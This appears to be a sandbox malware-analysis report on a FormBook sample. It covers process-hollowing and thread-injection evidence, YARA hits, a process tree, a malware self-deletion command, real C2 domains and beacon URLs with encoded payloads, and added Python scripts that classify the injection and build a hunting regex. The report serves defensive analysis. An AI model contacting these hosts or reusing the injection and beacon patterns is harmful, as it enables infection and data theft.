Source: explorer.exe, 00000004.00000002.596849934.0000000000EE0000.00000002.00000001.sdmp, wlanext.exe, 00000007.00000002.598188389.0000000005480000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000002.596849934.0000000000EE0000.00000002.00000001.sdmp, wlanext.exe, 00000007.00000002.598188389.0000000005480000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000004.00000002.596849934.0000000000EE0000.00000002.00000001.sdmp, wlanext.exe, 00000007.00000002.598188389.0000000005480000.00000002.00000001.sdmp Binary or memory string: &Program Manager
Source: explorer.exe, 00000004.00000002.596849934.0000000000EE0000.00000002.00000001.sdmp, wlanext.exe, 00000007.00000002.598188389.0000000005480000.00000002.00000001.sdmp Binary or memory string: Progmanlock
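
The evidence above describes two injection paths: the dropper creates RegSvcs.exe, allocates RWX memory at its image base 0x400000 and writes an MZ header there, while RegSvcs.exe and later wlanext.exe map sections into explorer.exe and wlanext.exe, set thread contexts in PID 3440, queue an APC and unmap wlanext.exe's image at 0x380000. The script below is an added example, not Joe Sandbox output: it parses these same lines (copied into REPORT_LINES), groups the events per source/target pair and assigns a verdict per pair. The stage names, verdict rules and the mapping to ATT&CK T1055 sub-techniques are the script's own choices, and because the report names the thread-context target by PID only, the script keeps PID 3440 as a separate target rather than guessing its image.

```python
"""
Reconstruct the injection chain from the behaviour lines listed above.

Added example written for this report, not part of Joe Sandbox. REPORT_LINES
is copied from the HIPS / PFW section above; stage names, verdict rules and
technique labels are this script's own.
"""
import re
from collections import defaultdict

# "Source: <process> <event>: <details> Jump to behavior"
LINE_RE = re.compile(
    r"^Source: (?P<src>.+?) "
    r"(?P<event>Process created|Memory allocated|Memory written|Section loaded|"
    r"Thread register set|Thread APC queued|Section unmapped): "
    r"(?P<rest>.*?)(?: Jump to behavior)?$"
)

DETAIL_RE = {
    "Process created":     re.compile(r"^(?P<target>\S+)"),
    "Memory allocated":    re.compile(r"^(?P<target>\S+) base: (?P<base>\w+) protect: (?P<prot>.*)$"),
    "Memory written":      re.compile(r"^(?P<target>\S+) base: (?P<base>\w+)(?: value starts with: (?P<magic>\w+))?$"),
    "Section loaded":      re.compile(r"^unknown target: (?P<target>\S+) protection: (?P<prot>.*)$"),
    "Thread register set": re.compile(r"^target process: (?P<pid>\d+)$"),
    "Thread APC queued":   re.compile(r"^target process: (?P<target>\S+)$"),
    "Section unmapped":    re.compile(r"^(?P<target>\S+) base address: (?P<base>\w+)$"),
}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1]


def parse_line(line: str):
    """Return (source, target, stage) or None if the line is not injection evidence."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    event, rest = m.group("event"), m.group("rest")
    d = DETAIL_RE[event].match(rest)
    if not d:
        return None
    f = d.groupdict()
    if event == "Process created":
        stage = "create"
    elif event == "Memory allocated":
        stage = "alloc_rwx" if "execute" in f["prot"] else "alloc"
    elif event == "Memory written":
        # 4D5A is "MZ": a PE header written into the child at its image base
        stage = "write_pe" if (f.get("magic") or "").upper() == "4D5A" else "write"
    elif event == "Section loaded":
        stage = "map_section"
    elif event == "Thread register set":
        stage = "set_context"
        f["target"] = "pid:" + f["pid"]      # report gives a PID, not an image
    elif event == "Thread APC queued":
        stage = "apc"
    else:
        stage = "unmap"
    target = f["target"] if f["target"].startswith("pid:") else basename(f["target"])
    return basename(m.group("src")), target, stage


def build_chains(lines):
    """Map (source, target) -> sorted list of distinct stages observed."""
    chains = defaultdict(set)
    for line in lines:
        parsed = parse_line(line)
        if parsed:
            src, target, stage = parsed
            chains[(src, target)].add(stage)
    return {k: sorted(v) for k, v in chains.items()}


def assess(stages) -> str:
    """Verdict for one source/target pair from the stages seen between them."""
    s = set(stages)
    if "unmap" in s or ("create" in s and "write_pe" in s):
        return "process hollowing (T1055.012)"
    if "apc" in s:
        return "APC injection (T1055.004)"
    if "set_context" in s:
        return "thread execution hijacking (T1055.003)"
    if s & {"map_section", "write_pe", "write", "alloc_rwx"}:
        return "code injection (T1055)"
    return "process creation only"


def report(lines):
    return [(src, dst, stages, assess(stages))
            for (src, dst), stages in sorted(build_chains(lines).items())]


# Copied from the report lines above (trailing "Jump to behavior" kept on purpose).
REPORT_LINES = [
    r"Source: C:\Users\user\Desktop\00098765123POIIU.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write Jump to behavior",
    r"Source: C:\Users\user\Desktop\00098765123POIIU.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A Jump to behavior",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write Jump to behavior",
    r"Source: C:\Windows\SysWOW64\wlanext.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread register set: target process: 3440 Jump to behavior",
    r"Source: C:\Windows\SysWOW64\wlanext.exe Thread register set: target process: 3440 Jump to behavior",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section unmapped: C:\Windows\SysWOW64\wlanext.exe base address: 380000 Jump to behavior",
    r"Source: C:\Users\user\Desktop\00098765123POIIU.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000 Jump to behavior",
    r"Source: C:\Users\user\Desktop\00098765123POIIU.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 642008 Jump to behavior",
    r"Source: C:\Users\user\Desktop\00098765123POIIU.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Jump to behavior",
    r"Source: C:\Windows\SysWOW64\wlanext.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe' Jump to behavior",
]

if __name__ == "__main__":
    for src, dst, stages, verdict in report(REPORT_LINES):
        print(f"{src} -> {dst}: {', '.join(stages)} => {verdict}")
```

The pair view is what matters for response: the dropper-to-RegSvcs.exe pair is a textbook hollow of a suspended, signed .NET host (create, RWX allocation at 0x400000, MZ written there), while the RegSvcs.exe-to-wlanext.exe pair shows the second hollow through a section unmap, and the cmd.exe child of wlanext.exe is ordinary process creation whose purpose (deleting RegSvcs.exe) is cleanup rather than injection.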

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\00098765123POIIU.exe Queries volume information: C:\Users\user\Desktop\00098765123POIIU.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 00000007.00000002.595659857.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.378011381.0000000000E40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.597635869.0000000003750000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.338604587.0000000004261000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.378035530.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 00000007.00000002.595659857.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.378011381.0000000000E40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.597635869.0000000003750000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.338604587.0000000004261000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.378035530.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Behavior Graph (ID 411893; sample 00098765123POIIU.exe; start date 12/05/2021; architecture WINDOWS; score 100), recovered from the graph rendering as a process tree:

00098765123POIIU.exe (started)
    dropped: C:\Users\user\...\00098765123POIIU.exe.log (ASCII)
    signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Injects a PE file into a foreign processes
    -> RegSvcs.exe (started)
        signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 2 other signatures
        -> explorer.exe (injected)
            DNS/IP: www.sandybottomsflipflops.com; www.muldentaxi.com (64.190.62.111, 49734, 80, NBS11696US, United States); 18 other IPs or domains
            signature: System process connects to network (likely due to code injection or exploit)
            -> wlanext.exe (started)
                signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                -> cmd.exe (started)
                    -> conhost.exe (started)

Sample-level nodes in the graph: DNS www.hysjs168.com; signatures Snort IDS alert for network traffic (e.g. based on Emerging Threat rules), Found malware configuration, Malicious sample detected (through community Yara rule), and 5 other signatures.

Contacted Public IPs

IP               Domain                     Country        ASN    ASN Name (AS country)  Malicious
198.54.117.217   parkingpage.namecheap.com  United States  22612  NAMECHEAP-NET (US)     false
160.153.132.205  bogolacke.com              United States  21501  GODADDY-AMS (DE)       true
199.192.23.253   www.contorig2.com          United States  22612  NAMECHEAP-NET (US)     true
173.236.152.151  www.buraktradingltd.com    United States  26347  DREAMHOST-AS (US)      true
34.102.136.180   gofourd.com                United States  15169  GOOGLE (US)            false
64.190.62.111    www.muldentaxi.com         United States  11696  NBS11696 (US)          true
172.217.168.83   ghs.googlehosted.com       United States  15169  GOOGLE (US)            false
45.39.20.158     www.ytksw.com              United States  18779  EGIHOSTING (US)        true

Contacted Domains

Name IP Active
www.muldentaxi.com 64.190.62.111 true
gofourd.com 34.102.136.180 true
embraceblm.com 34.102.136.180 true
www.hysjs168.com 182.61.46.180 true
www.buraktradingltd.com 173.236.152.151 true
bogolacke.com 160.153.132.205 true
parkingpage.namecheap.com 198.54.117.217 true
www.ytksw.com 45.39.20.158 true
albanyhumanesociety.net 34.102.136.180 true
ghs.googlehosted.com 172.217.168.83 true
www.contorig2.com 199.192.23.253 true
www.maraitime.com unknown unknown
www.ihdeuruim.com unknown unknown
www.embraceblm.com unknown unknown
www.soccer-yokouchi.club unknown unknown
www.helenafinaltouch.com unknown unknown
www.bogolacke.com unknown unknown
www.albanyhumanesociety.net unknown unknown
www.gofourd.com unknown unknown
www.sandybottomsflipflops.com unknown unknown

Contacted URLs

Name, followed by Malicious / Antivirus Detection / Reputation:

http://www.bogolacke.com/uv34/?D0Dhj=+vqKyqUCNNB8UOC5vqb0WBoKaqjxAK/4hHhktlBEWoOvrJqCXDBsl1GlrElBRZa3I6kwNHO8pA==&_JB=SL3d2L8
    Malicious: true | Avira URL Cloud: safe | Reputation: unknown
http://www.muldentaxi.com/uv34/?D0Dhj=I0+BvmO4ljK/nbLycIQPHPNytqxJ+McfjEJZrssF4WFDr3bjf8ExST5+Hjhrql3HpJj1V9F8nQ==&_JB=SL3d2L8
    Malicious: true | Avira URL Cloud: safe | Reputation: unknown
http://www.embraceblm.com/uv34/?_JB=SL3d2L8&D0Dhj=eNNoAymEF6y0s09AHznbvWkLlOIpJJQGxSgvNiYX7faSVxdWVtwFBOGKoePvfd+8zgTPPgb0Mw==
    Malicious: false | Avira URL Cloud: safe | Reputation: unknown
www.hysjs168.com/uv34/
    Malicious: true | Avira URL Cloud: safe | Reputation: low
http://www.ihdeuruim.com/uv34/?D0Dhj=zJB2497tyCkLF9DVAXbTh77yBITnH8u2gz7PlO+nNFbEPXoEJKTpFMEIIpupFtT+IJYk9y/VZw==&_JB=SL3d2L8
    Malicious: false | Avira URL Cloud: safe | Reputation: unknown
http://www.buraktradingltd.com/uv34/?_JB=SL3d2L8&D0Dhj=D75OsDlTHma4nCt/XHhVQTvedHvqJVej3CEGNnFddBs05fHEvG09IitQFVRojVJr/TkJxJHlYg==
    Malicious: true | Avira URL Cloud: safe | Reputation: unknown
http://www.albanyhumanesociety.net/uv34/?_JB=SL3d2L8&D0Dhj=n+Qx4VWs28a7eV8im5Y5Lb9MLKmoTPPxFKEnTVg2IpEKdb6ImeQQO/tB44tc09WLnIG/s9VgcA==
    Malicious: false | Avira URL Cloud: safe | Reputation: unknown
http://www.contorig2.com/uv34/?_JB=SL3d2L8&D0Dhj=PNkuYexmaEbpw3EaQG1gqEXEhReu9m0wSncWUc9u1VG5H+XH3gAiJ6++bzNk4ZSFpS3p79DaPA==
    Malicious: true | Avira URL Cloud: safe | Reputation: unknown
http://www.gofourd.com/uv34/?_JB=SL3d2L8&D0Dhj=JPLVpJ2/QgCmFDz5d9+MEwsOtRSRnv4p4HgKpBtvwLNy+R4nAh4AcVIWdvhB9Yv67aR/bJ0jJQ==
    Malicious: false | Avira URL Cloud: safe | Reputation: unknown
http://www.sandybottomsflipflops.com/uv34/?_JB=SL3d2L8&D0Dhj=/y2QUNCyd1bGxdPjEN+TG3wvArtE+ieT5j9LKQh68qSP5982epgdoI7eXFRWiHaQS6pCkVOSpw==
    Malicious: true | Avira URL Cloud: safe | Reputation: unknown
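
All of these beacons share the path /uv34/ and a constant _JB=SL3d2L8 parameter, with the order of the two parameters varying and the D0Dhj value changing per host. FormBook works through its configured domain list this way and typically only one of the hosts is the live C2, so the durable indicator is the URI shape rather than any one domain. The script below is an added example, not Joe Sandbox code: it profiles the table's URLs (copied verbatim into CONTACTED_URLS), separates the constant from the per-host parameters and derives an order-independent URI regex for proxy or IDS hunting. The function names and the assumption that the payload value is base64-alphabet text are the script's own.

```python
"""
Profile the FormBook beacon URLs from the Contacted URLs table above.

Added example written for this report, not part of Joe Sandbox. CONTACTED_URLS
is copied from the table; profiling logic, regex and helper names are this
script's own.
"""
import re
from urllib.parse import urlsplit

CONTACTED_URLS = [
    "http://www.bogolacke.com/uv34/?D0Dhj=+vqKyqUCNNB8UOC5vqb0WBoKaqjxAK/4hHhktlBEWoOvrJqCXDBsl1GlrElBRZa3I6kwNHO8pA==&_JB=SL3d2L8",
    "http://www.muldentaxi.com/uv34/?D0Dhj=I0+BvmO4ljK/nbLycIQPHPNytqxJ+McfjEJZrssF4WFDr3bjf8ExST5+Hjhrql3HpJj1V9F8nQ==&_JB=SL3d2L8",
    "http://www.embraceblm.com/uv34/?_JB=SL3d2L8&D0Dhj=eNNoAymEF6y0s09AHznbvWkLlOIpJJQGxSgvNiYX7faSVxdWVtwFBOGKoePvfd+8zgTPPgb0Mw==",
    "www.hysjs168.com/uv34/",
    "http://www.ihdeuruim.com/uv34/?D0Dhj=zJB2497tyCkLF9DVAXbTh77yBITnH8u2gz7PlO+nNFbEPXoEJKTpFMEIIpupFtT+IJYk9y/VZw==&_JB=SL3d2L8",
    "http://www.buraktradingltd.com/uv34/?_JB=SL3d2L8&D0Dhj=D75OsDlTHma4nCt/XHhVQTvedHvqJVej3CEGNnFddBs05fHEvG09IitQFVRojVJr/TkJxJHlYg==",
    "http://www.albanyhumanesociety.net/uv34/?_JB=SL3d2L8&D0Dhj=n+Qx4VWs28a7eV8im5Y5Lb9MLKmoTPPxFKEnTVg2IpEKdb6ImeQQO/tB44tc09WLnIG/s9VgcA==",
    "http://www.contorig2.com/uv34/?_JB=SL3d2L8&D0Dhj=PNkuYexmaEbpw3EaQG1gqEXEhReu9m0wSncWUc9u1VG5H+XH3gAiJ6++bzNk4ZSFpS3p79DaPA==",
    "http://www.gofourd.com/uv34/?_JB=SL3d2L8&D0Dhj=JPLVpJ2/QgCmFDz5d9+MEwsOtRSRnv4p4HgKpBtvwLNy+R4nAh4AcVIWdvhB9Yv67aR/bJ0jJQ==",
    "http://www.sandybottomsflipflops.com/uv34/?_JB=SL3d2L8&D0Dhj=/y2QUNCyd1bGxdPjEN+TG3wvArtE+ieT5j9LKQh68qSP5982epgdoI7eXFRWiHaQS6pCkVOSpw==",
]

# Assumed shape of the per-host payload: base64 alphabet with optional padding.
B64_VALUE = r"[A-Za-z0-9+/]+={0,2}"


def _with_scheme(url: str) -> str:
    return url if "://" in url else "http://" + url   # table has one scheme-less entry


def parse_beacon(url: str) -> dict:
    """Split a beacon URL into host, path and query parameters.

    The query is split by hand: urllib's parse_qs would turn the '+' inside
    the base64 payload into a space and corrupt the value.
    """
    parts = urlsplit(_with_scheme(url))
    params = {}
    if parts.query:
        for item in parts.query.split("&"):
            key, _, value = item.partition("=")
            params[key] = value
    return {"host": parts.hostname, "path": parts.path, "params": params}


def uri(url: str) -> str:
    """Path plus query, the part a proxy or IDS rule sees after the Host header."""
    parts = urlsplit(_with_scheme(url))
    return parts.path + ("?" + parts.query if parts.query else "")


def profile(urls) -> dict:
    """Find the shared path and split query keys into constant and per-host ones."""
    beacons = [parse_beacon(u) for u in urls]
    paths = sorted({b["path"] for b in beacons})
    with_query = [b for b in beacons if b["params"]]
    keys = set.intersection(*(set(b["params"]) for b in with_query)) if with_query else set()
    constant, variable = {}, []
    for k in sorted(keys):
        values = {b["params"][k] for b in with_query}
        if len(values) == 1:
            constant[k] = values.pop()
        else:
            variable.append(k)
    return {"path": paths[0] if len(paths) == 1 else paths,
            "hosts": sorted({b["host"] for b in beacons}),
            "constant_params": constant, "variable_params": variable}


def hunting_regex(prof: dict) -> str:
    """Order-independent regex over the URI: fixed path, every key via lookahead."""
    paths = prof["path"] if isinstance(prof["path"], list) else [prof["path"]]
    rx = r"^(?:" + "|".join(re.escape(p) for p in paths) + r")\?"
    for k, v in prof["constant_params"].items():
        rx += r"(?=(?:[^&]*&)*" + re.escape(k) + "=" + re.escape(v) + r"(?:&|$))"
    for k in prof["variable_params"]:
        rx += r"(?=(?:[^&]*&)*" + re.escape(k) + "=" + B64_VALUE + r"(?:&|$))"
    return rx + r"\S*$"


def is_beacon_uri(prof: dict, uri_str: str) -> bool:
    return re.match(hunting_regex(prof), uri_str) is not None


if __name__ == "__main__":
    prof = profile(CONTACTED_URLS)
    print(prof)
    print(hunting_regex(prof))
```

The lookahead form matters because the sample emits both parameter orders (D0Dhj first and _JB first), so a literal substring match on one ordering would miss half the beacons; the regex keys on the campaign path and the constant _JB value, which are the parts this build shares across all its domains.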